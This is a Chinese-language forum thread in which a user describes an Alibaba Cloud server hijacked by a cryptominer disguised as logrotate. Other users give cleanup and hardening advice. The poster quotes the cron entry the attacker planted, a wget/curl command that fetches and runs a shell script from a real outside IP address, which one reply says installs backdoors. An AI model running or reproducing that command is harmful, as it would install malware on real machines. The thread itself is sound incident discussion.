这是一个创建于 497 天前的主题,其中的信息可能已经有所发展或是发生改变。
logroate 进程在狂刷 cpu , 知道是什么侵入的( 这是最可怕的) ,太可恶了,可怕。。。。
 | 1 bigxianyu OP 然后阿里云告诉我说,你当前账号用的是免费版云安全中心,不支持病毒查杀。。。。 |
 | 2 Canglin 2024-06-01 10:25:28 +08:00 不过可以看是哪些进程,kill 掉后删除就好了,我也被弄过 |
 | 3 Foxkeh 2024-06-01 10:30:59 +08:00 只能检查下 SSH 和各种暴露到公网的弱密码, 安全组, 不明来源的软件或被爆出漏洞的第三方 Web 应用(尤其是用 root 权限运行的) 然后建议重装 |
 | 4 tinyfry 2024-06-01 10:33:38 +08:00 果断重装,不要开放一些不用的端口,密码强度要设置高一些,定期对组件进行升级。 |
| 5 bigxianyu OP @daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) , 这是 cron 任务里被添加的东西 |
 | 7 idragonet 2024-06-01 10:48:59 +08:00 系统重新安装肯定的,SSH 只开证书登录。 |
| 9 bigxianyu OP |
 | 11 virusdefender 2024-06-01 11:30:07 +08:00  1 据我经验,50% 是 ssh 弱口令,30% 是 redis 弱口令,20% 是各种其他漏洞。 |
| 12 Canglin 2024-06-01 13:49:31 +08:00 @bigxianyu #6 你是不是用过那种公共的 docker 镜像啊?我之前弄过一个 Oracle 和 MySql ,就被挖矿了 |
 | 13 slowman 2024-06-01 14:05:06 +08:00 6 就是因为你们这种人,国产服务和 APP 才肆无忌惮的以安全保护的名义查用户的数据 |
 | 14 Pierro 2024-06-01 15:24:00 +08:00 之前用 docker 远程部署镜像 端口有漏洞就被挖矿了 各种查定时文件什么的 清了还是会自动执行 就直接重装了 |
 | 15 itechify PRO http://185.196.8.123/logservice.sh 这个文件做了好几个后门,systemd ,.bashrc ,cron ,都检查下 |
| 16 bigxianyu OP @oneisall8955 嗯嗯,是这三个 |
 | 17 akira 2024-06-01 22:40:24 +08:00 服务器直接作废 重新开一台吧,然后好好做好安全 |
 | 18 Gilfoyle26 2024-06-02 02:03:52 +08:00 阿里云这个回复,是真的让人心寒。 |
 | 20 ynkcc 2024-06-08 03:23:42 +08:00 via Android |
 | 21 lazyrm 2024-06-23 15:08:04 +08:00 via iPhone 我上次是因为开启了 jdk 的远程调试 |
 | 22 yier4ha 2024-06-27 09:21:20 +08:00 xmr 门罗币挖矿 我都遇到好多次了。清除了 没用。然后把脚本里面的文件权限改了也不行。会检测 xmrig 没有执行权限他会自动授权。我感觉那次不是 ssh 弱口令问题,我改了好几次密码都会回来,而且重启路由改变了 IP 没过多久还是会进来,可能是某个看起来正常的我还在用的服务有问题。最后重装系统才搞定。 |
Select Language